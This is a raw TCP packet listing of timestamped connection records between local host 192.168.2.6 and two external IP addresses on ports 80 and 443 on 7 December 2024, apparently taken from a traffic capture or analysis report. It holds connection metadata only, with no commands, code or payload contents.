Dec 7, 2024 10:51:49.872857094 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872869015 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872875929 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.872888088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872893095 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.872900963 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.872924089 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.872947931 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.873239040 CET	443	49824	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.873315096 CET	443	49824	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.873744965 CET	443	49825	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.873790026 CET	443	49826	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.873807907 CET	443	49825	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.873811960 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.873825073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.873836994 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.873847961 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.873859882 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.873863935 CET	443	49826	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.873876095 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.873883963 CET	49825	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.873884916 CET	49824	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.873888969 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.873899937 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.873912096 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.873923063 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.873929977 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.873939037 CET	443	49827	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.873943090 CET	49826	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.873967886 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.873995066 CET	443	49827	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.874129057 CET	49827	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.874702930 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.874716997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.874728918 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.874741077 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.874751091 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.874763012 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.874773979 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.874785900 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.874789953 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.874799013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.874809980 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.874830961 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.874840975 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.874870062 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.875307083 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.875334024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.875344038 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.875355959 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.875364065 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.875365973 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.875380993 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.875381947 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.875412941 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.875412941 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.875428915 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.875432968 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.875442982 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.875456095 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.875458956 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.875467062 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.875478983 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.875478983 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.875492096 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.875504017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.875511885 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.875529051 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.875551939 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.876275063 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.876296997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.876315117 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.876327038 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.876337051 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.876348972 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.876368046 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.876369953 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.876380920 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.876403093 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.876422882 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.876425982 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.876440048 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.876451969 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.876463890 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.876475096 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.876487970 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.876494884 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.876522064 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.876547098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.877250910 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.877263069 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.877279997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.877290964 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.877301931 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.877312899 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.877324104 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.877335072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.877346039 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.877346992 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.877358913 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.877371073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.877374887 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.877384901 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.877396107 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.877397060 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.877424002 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.877434015 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.878010988 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878025055 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878036976 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878078938 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.878108025 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878118992 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878129959 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878143072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878159046 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878171921 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.878176928 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878189087 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878190041 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.878207922 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.878235102 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.878838062 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878850937 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878870010 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878875017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878880978 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878890991 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878896952 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878901958 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878907919 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878914118 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878920078 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878925085 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878931046 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.878931046 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.879019976 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.879800081 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.879812956 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.879823923 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.879842043 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.879853010 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.879859924 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.879867077 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.879878044 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.879882097 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.879897118 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.879906893 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.879909039 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.879924059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.879935026 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.879936934 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.879949093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.879956007 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.879960060 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.879972935 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.879975080 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.880007982 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.880033970 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.880523920 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.880537033 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.880548000 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.880563021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.880594015 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.880599976 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.880611897 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.880623102 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.880634069 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.880635023 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.880665064 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.880666971 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.880683899 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.880691051 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.880696058 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.880708933 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.880721092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.880727053 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.880733967 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.880755901 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.880774021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.881546974 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.881561041 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.881572962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.881583929 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.881618977 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.881650925 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.881664038 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.881676912 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.881697893 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.881715059 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.881831884 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.881844044 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.881869078 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.881882906 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.882100105 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.882211924 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.882270098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.883024931 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.883130074 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.883187056 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.884006977 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.884083986 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.884114027 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.884210110 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.884884119 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.884937048 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.885096073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.885320902 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.885831118 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.885953903 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.886006117 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.886775017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.886966944 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.887047052 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.887718916 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.887856007 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.887993097 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.888748884 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.888967991 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.889029980 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.889580965 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.889805079 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.889807940 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.890126944 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.890552044 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.890629053 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.890672922 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.891496897 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.891536951 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.891719103 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.891755104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.892447948 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.892494917 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.892529964 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.892564058 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.893369913 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.893412113 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.893501043 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.893594027 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.894300938 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.894356012 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.894428968 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.894462109 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.897619963 CET	49824	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.897667885 CET	443	49824	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.897686958 CET	49824	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.897696018 CET	443	49824	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.899216890 CET	49825	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.899255991 CET	443	49825	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.899286032 CET	49825	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.899295092 CET	443	49825	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.900264978 CET	49826	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.900295019 CET	443	49826	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.900312901 CET	49826	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.900320053 CET	443	49826	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.901573896 CET	49827	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.901586056 CET	49827	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.901587963 CET	443	49827	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.901593924 CET	443	49827	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.916985989 CET	49830	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.917032003 CET	443	49830	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.918169022 CET	49830	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.919130087 CET	49831	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.919194937 CET	443	49831	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.919266939 CET	49831	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.921993971 CET	49832	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.922035933 CET	443	49832	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.922146082 CET	49832	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.922373056 CET	49830	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.922389030 CET	443	49830	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.923471928 CET	49831	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.923486948 CET	443	49831	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.923577070 CET	49832	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.923594952 CET	443	49832	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.924447060 CET	49833	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.924499035 CET	443	49833	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.924552917 CET	49833	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.924711943 CET	49833	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:49.924726009 CET	443	49833	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:49.943654060 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.943713903 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.943840981 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.943881035 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.989869118 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.990015030 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.990086079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.990159035 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.990211010 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.990880966 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.990914106 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.990968943 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.991892099 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.991944075 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.991996050 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.992033958 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.992976904 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.993040085 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.993081093 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.993911028 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.993952990 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.993953943 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.993987083 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.994649887 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.994684935 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.994759083 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.994792938 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.995589018 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.995631933 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.995744944 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.995790005 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.996514082 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.996788979 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.996802092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.996840000 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.997472048 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.997514963 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.997564077 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.997598886 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.998445034 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.998552084 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.998589993 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.999555111 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.999593973 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:49.999661922 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:49.999705076 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.000334024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.000361919 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.000377893 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.000406027 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.001367092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.001413107 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.001420021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.001446962 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.002578974 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.002734900 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.002788067 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.003407955 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.003458023 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.003518105 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.003556013 CET	49808	80	192.168.2.6	185.215.113.206
